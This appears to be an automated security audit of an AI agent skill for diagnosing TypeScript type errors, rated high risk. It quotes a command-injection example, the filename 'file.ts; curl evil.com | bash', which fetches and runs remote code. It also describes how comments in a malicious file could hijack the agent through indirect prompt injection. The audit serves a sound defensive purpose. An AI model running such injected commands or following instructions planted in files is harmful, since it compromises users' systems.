diagnosing-type-errors
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill's task includes running a bash command
pnpm type-check 2>&1 | grep "target-file"where the file path is provided by the user. If the agent does not sanitize this input, it allows for command injection (e.g., using a filename like 'file.ts; curl evil.com | bash'). - [PROMPT_INJECTION] (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8). 1. Ingestion points: It is explicitly designed to read and analyze the content of user-specified TypeScript files. 2. Boundary markers: There are no instructions to wrap file content in delimiters or to ignore instructions embedded in the code. 3. Capability inventory: The skill has the capability to execute shell commands and generate code refactors. 4. Sanitization: No sanitization of the input file content is performed. A malicious file could include comments that redirect the agent's behavior during analysis.
Recommendations
- AI detected serious security threats
Audit Metadata